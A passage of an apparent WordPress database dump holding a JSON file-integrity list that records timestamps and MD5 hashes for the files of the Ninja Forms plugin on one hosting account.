8e0235d35810ecb2c9ad5b2b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/field-input-limit.html\":{\"d\":1535620878,\"h\":\"115030153c16ffd4a0786b1057e5a919\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/admin-wp-die.html.php\":{\"d\":1535620878,\"h\":\"0dd56c1499dfbb7c26eb6bd72c22fc31\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/fields-textbox.html\":{\"d\":1535620878,\"h\":\"8746fc5d3628fce6815c9df0fc47d31b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/fields-city.html\":{\"d\":1535620878,\"h\":\"958a677b3410007883ed399dd455a906\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/admin-menu-subs-filter.html.php\":{\"d\":1535620878,\"h\":\"17e63362769d18a2210b58354b63f9eb\"}}','2019-09-19 08:59:24'),(5,'file-list','files',3,'{\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/fields-textarea.html\":{\"d\":1535620878,\"h\":\"c998c1360a9e19b012feb9e18a6cb3a6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/fields-zip.html\":{\"d\":1535620878,\"h\":\"c27a1b8a761c4752b14e213551a38c14\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/admin-menu-settings-licenses.html.php\":{\"d\":1535620878,\"h\":\"50a46084e968677378dc0a2b7d02bc45\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/admin-menu-settings.html.php\":{\"d\":1535620878,\"h\":\"fcd22f8e0b03787287ac89908a4622e6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/ui-nf-drawer-buttons.html.php\":{\"d\":1535620878,\"h\":\"d49c5d13b29b56f16a1b727dc8433a59\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/form-hp.html\":{\"d\":1535620878,\"h\":\"c4a647b9d4b1e05245b7403d420b718d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/fields-email.html\":{\"d\":1535620878,\"h\":\"cadfcbc2a2625a45b1eafc39054f9d9f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/display-form-container.html.php\":{\"d\":1535620878,\"h\":\"862195522f2b3929b17e945d8e298a5f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/formtemplate-eventregistration.nff\":{\"d\":1535620878,\"h\":\"ff22b0502c3201b0c76ee01956c34ef7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/fields-address2.html\":{\"d\":1535620878,\"h\":\"71d4645525f4d1b290f0b4e8f06ee1cb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/display-noscript-message.html.php\":{\"d\":1535620878,\"h\":\"fa9e35ca097f0ec903c0f653dd55e8de\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/app-before-form.html\":{\"d\":1535620878,\"h\":\"52c0237236c2f86a935de99b7689aa96\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/admin-metabox-sub-info.html.php\":{\"d\":1535620878,\"h\":\"9642742d51b555dfd12499cb09c1679b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/formtemplate-exportdata.nff\":{\"d\":1535620878,\"h\":\"87f845788abdc63f0782d44fd82f968f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/form-layout.html\":{\"d\":1535620878,\"h\":\"5f7ecb1779fe3f2fd360318a0c4d4b4b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/wpcli-header-art.txt\":{\"d\":1535620878,\"h\":\"84a7546f27c43e2d6c1c6d9ce8884e27\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/fields-submit.html\":{\"d\":1535620878,\"h\":\"3887c6581ee5cc6c6278161b62c363f6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/fields-label.html\":{\"d\":1535620878,\"h\":\"ebc043eaf801ec5c5b721d5768480d04\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/formtemplate-contactform.nff\":{\"d\":1535620878,\"h\":\"c527cbc8c3918467db36c77bd98afd70\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/formtemplate-questionnaire.nff\":{\"d\":1535620878,\"h\":\"9a80731f846da43d459ed23c239cd815\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/admin-menu-import-export.html.php\":{\"d\":1535620878,\"h\":\"42a6d55546b0b9d8830be07caa663d22\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/admin-metabox-submission-example.php\":{\"d\":1535620878,\"h\":\"c04e8af705a360c6bb4f6963de6aa87b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/fields-number.html\":{\"d\":1535620878,\"h\":\"52bd6e94dccf18cb0de91e7c72543fe4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/formtemplate-jobapplication.nff\":{\"d\":1535620878,\"h\":\"7e655cd8e1b343507d54de052dc02715\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/admin-metabox-import-export-favorite-fields-export.html.php\":{\"d\":1535620878,\"h\":\"b56097e73b514efc289d458b61ea4932\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/field-layout.html\":{\"d\":1535620878,\"h\":\"ae8796a1cf4f29c1b240caae4acc645a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/field-after.html\":{\"d\":1535620878,\"h\":\"9bae22bd09d8a2b2665a5880eef7be78\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/fields-shipping.html\":{\"d\":1535620878,\"h\":\"df603c9a5dfe201c24b6114bcdf98767\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/fields-recaptcha.html\":{\"d\":1535620878,\"h\":\"1bfe77e8c10377d872947e19362bc5f4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/formtemplate-enquiry.nff\":{\"d\":1535620878,\"h\":\"6488345ff1fbddc684ea8a64eaddb4ee\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/fields-starrating.html\":{\"d\":1535620878,\"h\":\"63127b50d8aabb4e23e72cc7eca84b7d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/example.nff\":{\"d\":1535620878,\"h\":\"8e5856ad8ce83f26c7d72b4942736e56\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/fields-color.html\":{\"d\":1535620878,\"h\":\"b61d3eb9eb0c3232e2a77a1b19fa629c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/fields-date.html\":{\"d\":1535620878,\"h\":\"8ef8e8484e425a238384d30ef1606d2c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/admin-menu-system-status.html.php\":{\"d\":1535620878,\"h\":\"95e7265d302f9e01c89ae4626c38114f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/fields-total.html\":{\"d\":1535620878,\"h\":\"0ce657c70fcd1789396a6d642923d269\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/admin-notice-form-import.html.php\":{\"d\":1535620878,\"h\":\"7b5830212da2e2c4ed8bd68fad8c627d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/fields-product.html\":{\"d\":1535620878,\"h\":\"7ec769fcd6eb84795fe5adbebda9c042\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/admin-menu-addons.html.php\":{\"d\":1535620878,\"h\":\"0186660ffe2c1cea75ced4ceec4941a1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/app-after-fields.html\":{\"d\":1535620878,\"h\":\"1ef6acd3d49ca6eda0b1577c71c6229d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/admin-menu-new-form.html.php\":{\"d\":1535620878,\"h\":\"fde70177aa78ed77599ca1b2d6676071\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/fields-html.html\":{\"d\":1535620878,\"h\":\"a12d2fff0b784765c563a1f95bcd1744\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/formtemplate-feedback.nff\":{\"d\":1535620878,\"h\":\"92f473d4bceba6308ff06f9603250ff8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/ui-nf-menu-drawer.html.php\":{\"d\":1535620878,\"h\":\"d0f4404229f7a78f725b598d4a51baba\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/form-error.html\":{\"d\":1535620878,\"h\":\"f1f1996c97ae8a0f7e4f7ea1c411fc83\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/fields-password.html\":{\"d\":1535620878,\"h\":\"34adea9a5316508597d80cad838e2751\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/fields-tax.html\":{\"d\":1535620878,\"h\":\"979d66eac47a80cfc8e4492a84e4d19f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/ui-item-controls.html.php\":{\"d\":1535620878,\"h\":\"db2408383e23734bb7328bc43f42cb8f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/admin-metabox-import-export-forms-import.html.php\":{\"d\":1535620878,\"h\":\"d15c8c083077105157df9af8e54aa0b7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/admin-notice.html.php\":{\"d\":1535620878,\"h\":\"c13ebe1d132b19c656debfc7e52e338d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Templates\\/app-after-form.html\":{\"d\":1535620878,\"h\":\"bb87e549f4166dae76356deb8e1fe739\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Actions\\/Custom.php\":{\"d\":1535620877,\"h\":\"78091366c89ed4b44cd053aff89b5be0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Actions\\/SuccessMessage.php\":{\"d\":1535620877,\"h\":\"d1d3ada68340dc3e651d843041d132ee\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Actions\\/ExportDataRequest.php\":{\"d\":1535620877,\"h\":\"d8ad83e85767ea2001336a1358e7deec\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Actions\\/Akismet.php\":{\"d\":1535620877,\"h\":\"ad82ef675b0b8122fffefca8c4093534\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Actions\\/Email.php\":{\"d\":1535620877,\"h\":\"820123ed653b06fb0e6c4e95764c57b5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Actions\\/Redirect.php\":{\"d\":1535620877,\"h\":\"1fdba916b645c6cef65aa707a09118fa\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Actions\\/DeleteDataRequest.php\":{\"d\":1535620877,\"h\":\"51c9a55d9a94ed636acf001f33b1771b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Actions\\/Save.php\":{\"d\":1535620877,\"h\":\"49f3ada71994359882ce96b48324c683\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Actions\\/CollectPayment.php\":{\"d\":1535620877,\"h\":\"f7c56ac7c0daf848c982b4eca9df58f3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Abstracts\\/LoggerInterface.php\":{\"d\":1535620877,\"h\":\"01d6067d0427f1b8cc3b94fc5f321ffc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Abstracts\\/BatchProcess.php\":{\"d\":1535620877,\"h\":\"78b76162f6038260ff5b879b43d991d5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Abstracts\\/Metabox.php\":{\"d\":1535620877,\"h\":\"74d1bc6aa84d59abd586253d50195fd0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Abstracts\\/ModelFactory.php\":{\"d\":1535620877,\"h\":\"f336dd99462f9b5bbec4b83da89a7d0e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Abstracts\\/Migration.php\":{\"d\":1535620877,\"h\":\"671b596f19b8792dcd2416a6ea1a3143\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Abstracts\\/SubmissionMetabox.php\":{\"d\":1535620877,\"h\":\"4cc26b505a4c8a27ba7bc9ac49510e1f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Abstracts\\/PaymentGateway.php\":{\"d\":1535620877,\"h\":\"118d8d04d142f7f86284cc9c5305ab10\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Abstracts\\/UserInfo.php\":{\"d\":1535620877,\"h\":\"ae36e700d4fa38a653eaa7ac9147fa53\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Abstracts\\/Extension.php\":{\"d\":1535620877,\"h\":\"2dfd4915f40ad6a7b508d70bf95026ef\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Abstracts\\/FieldOptIn.php\":{\"d\":1535620877,\"h\":\"9bd0eaef8bc5c79ebaa1628efa288cb3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Abstracts\\/Logger.php\":{\"d\":1535620877,\"h\":\"f6aaf30d9fb6946e6bf7524d554bb48e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Abstracts\\/Submenu.php\":{\"d\":1535620877,\"h\":\"73dd551413f383a11e7ddc057a0bfead\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Abstracts\\/Model.php\":{\"d\":1535620877,\"h\":\"aeaaf215b35580f41df43882730bb8a2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Abstracts\\/Input.php\":{\"d\":1535620877,\"h\":\"bed83ebe6cb77d687f8690833d4e05f3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Abstracts\\/LogLevel.php\":{\"d\":1535620877,\"h\":\"111bf89da649af80df4cda15c28f5b69\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Abstracts\\/ActionNewsletter.php\":{\"d\":1535620877,\"h\":\"ccd65f95d4c5b3f667f163ca831152a7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Abstracts\\/Menu.php\":{\"d\":1535620877,\"h\":\"03d6c6306b04bd380a278f49f5db9677\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Abstracts\\/Action.php\":{\"d\":1535620877,\"h\":\"92a75f202d626a401e2651973862a438\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Abstracts\\/MergeTags.php\":{\"d\":1535620877,\"h\":\"2899d6e2121b2eb0c985be83acacb41f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Abstracts\\/Field.php\":{\"d\":1535620877,\"h\":\"7dc8eb75fa730f32791993cb1e88ec29\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Abstracts\\/List.php\":{\"d\":1535620877,\"h\":\"cbb1095621c7124f6a6d26129d37daf8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Abstracts\\/Controller.php\":{\"d\":1535620877,\"h\":\"b09f3b5f26050f48b3f13ad7f241a36f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/WPCLI\\/NinjaFormsCommand.php\":{\"d\":1535620877,\"h\":\"78472af9cc881d99a11f65be3527e9d3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/AJAX\\/Processes\\/UpdateFields.php\":{\"d\":1535620877,\"h\":\"124ea2fca42a0c1528f1da100011a816\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/AJAX\\/Processes\\/NullProcess.php\":{\"d\":1535620877,\"h\":\"1e78f0b08bf9d5b073fd08d0a331161d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/AJAX\\/Controllers\\/DeleteAllData.php\":{\"d\":1535620877,\"h\":\"5ebc88d4e3d7874b772c1d7b732d49c7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/AJAX\\/Controllers\\/Submission.php\":{\"d\":1535620877,\"h\":\"1f557787ffe2fa7a6a09e43a404bea16\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/AJAX\\/Controllers\\/Fields.php\":{\"d\":1535620877,\"h\":\"0cc746f7d158428101d2d4ce24901485\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/AJAX\\/Controllers\\/Form.php\":{\"d\":1535620877,\"h\":\"fa125a5f10c759900cd69b9d51d1d2c0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/AJAX\\/Controllers\\/JSError.php\":{\"d\":1535620877,\"h\":\"04e142d2e5f6f51a5bd22ab28b41ba2a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/AJAX\\/Controllers\\/SavedFields.php\":{\"d\":1535620877,\"h\":\"7d61bfef9750996cf66a895b82e33fd2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/AJAX\\/Controllers\\/DispatchPoints.php\":{\"d\":1535620877,\"h\":\"6091fefcff32229fb8998a34837878ca\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/AJAX\\/Controllers\\/Preview.php\":{\"d\":1535620877,\"h\":\"e1a026f5f608bacc9fc37b01a900612a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/AJAX\\/Controllers\\/FormEndpoints.php\":{\"d\":1535620877,\"h\":\"f6ed7c852a683086d8fee92f1cee8aab\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/AJAX\\/REST\\/BatchProcess.php\":{\"d\":1535620877,\"h\":\"e21b2d9f86d32e25d9941673a662488b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/AJAX\\/REST\\/NewFormTemplates.php\":{\"d\":1535620877,\"h\":\"9496f4b2c585e24eb771931f4f26459f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/AJAX\\/REST\\/Forms.php\":{\"d\":1535620877,\"h\":\"d99f31ed2ccded4df2d4a26f8f70b494\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/AJAX\\/REST\\/Controller.php\":{\"d\":1535620877,\"h\":\"db4b7ecdababf930321e3a33948edd86\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/AJAX\\/Requests\\/DeleteField.php\":{\"d\":1535620877,\"h\":\"b9c71d711ee600f0d8dc480aa8f89655\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/AJAX\\/Requests\\/NullRequest.php\":{\"d\":1535620877,\"h\":\"f3a9e8131628bae16f6736af96745bfc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Display\\/Render.php\":{\"d\":1535620878,\"h\":\"8798396890f5832a2ce3a1b6b94a49f2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Display\\/Shortcodes.php\":{\"d\":1535620878,\"h\":\"5e1738cdbfc57f7e8302fc35665647a6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Display\\/Preview.php\":{\"d\":1535620878,\"h\":\"6773abbb07f0160a9a65dce1d4747d1a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/Models\\/Submission.php\":{\"d\":1535620878,\"h\":\"9bfdf71adb5aa4e82a64ae234f80b8cc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/Models\\/Form.php\":{\"d\":1535620878,\"h\":\"4e73a3bf6846960582d2ee4c1149dba0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/Models\\/Action.php\":{\"d\":1535620878,\"h\":\"883166ea27b791cb932c4346d0d2f42c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/Models\\/Object.php\":{\"d\":1535620878,\"h\":\"0e5ba76710568a1355bb794076316147\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/Models\\/Field.php\":{\"d\":1535620878,\"h\":\"a02afee20a28f376d78881b264a24b84\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/Migrations\\/Upgrades.php\":{\"d\":1535620878,\"h\":\"3a6397968fc1d3c0ed84ab0203da7110\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/Migrations\\/ActionMeta.php\":{\"d\":1535620878,\"h\":\"66c303ad7a83e8a5e1d312e4155abab3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/Migrations\\/FieldMeta.php\":{\"d\":1535620878,\"h\":\"a8cb5889dba6f5b2b59ece586300cec1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/Migrations\\/Fields.php\":{\"d\":1535620878,\"h\":\"57494ae8cb5919bfc6f9a24f6091398e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/Migrations\\/Actions.php\":{\"d\":1535620878,\"h\":\"ee293ac3d7d677aeec1a174e65cf883c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/Migrations\\/ObjectMeta.php\":{\"d\":1535620878,\"h\":\"d7a5a6e910abf22369e4ffa200449fa9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/Migrations\\/Settings.php\":{\"d\":1535620878,\"h\":\"0272b7af508064666fba1a8858ec5f3f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/Migrations\\/Relationships.php\":{\"d\":1535620878,\"h\":\"224a725d240ece77e824ff2586152226\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/Migrations\\/FormMeta.php\":{\"d\":1535620878,\"h\":\"7b4450ac94c46d3d5a538f620e8b260d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/Migrations\\/Objects.php\":{\"d\":1535620878,\"h\":\"a81775de0ba142feb03514ddacab4d70\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/Migrations\\/Chunks.php\":{\"d\":1535620878,\"h\":\"da1457e095ca40df2ecd561cc75acccc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/Migrations\\/Forms.php\":{\"d\":1535620878,\"h\":\"89acb47fe026710fa54aaec5c25bd51e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/PublishProcessing.php\":{\"d\":1535620878,\"h\":\"73ac63e264ab82c63ca4a3ff641986cc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/MockData.php\":{\"d\":1535620878,\"h\":\"d86917057e8e17fae79118e08ad87d13\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/SubmissionExpirationCron.php\":{\"d\":1535620878,\"h\":\"cf742809c2ba615b0e4fb4198d2e4982\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/FieldsController.php\":{\"d\":1535620878,\"h\":\"1cb7ae60ba3c6458bdf6b4deaaa97305\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/Logger.php\":{\"d\":1535620878,\"h\":\"cea852d423686ded1ec1100b7dc67bb0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/Migrations.php\":{\"d\":1535620878,\"h\":\"9bbb552ab93ee0136d1326cef23c74e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Database\\/FormsController.php\":{\"d\":1535620878,\"h\":\"7d059071f2986861efa389f2e2404a8e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/MergeTags\\/WP.php\":{\"d\":1535620878,\"h\":\"5789e6033c76d9cbc4a61b33a3cf2487\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\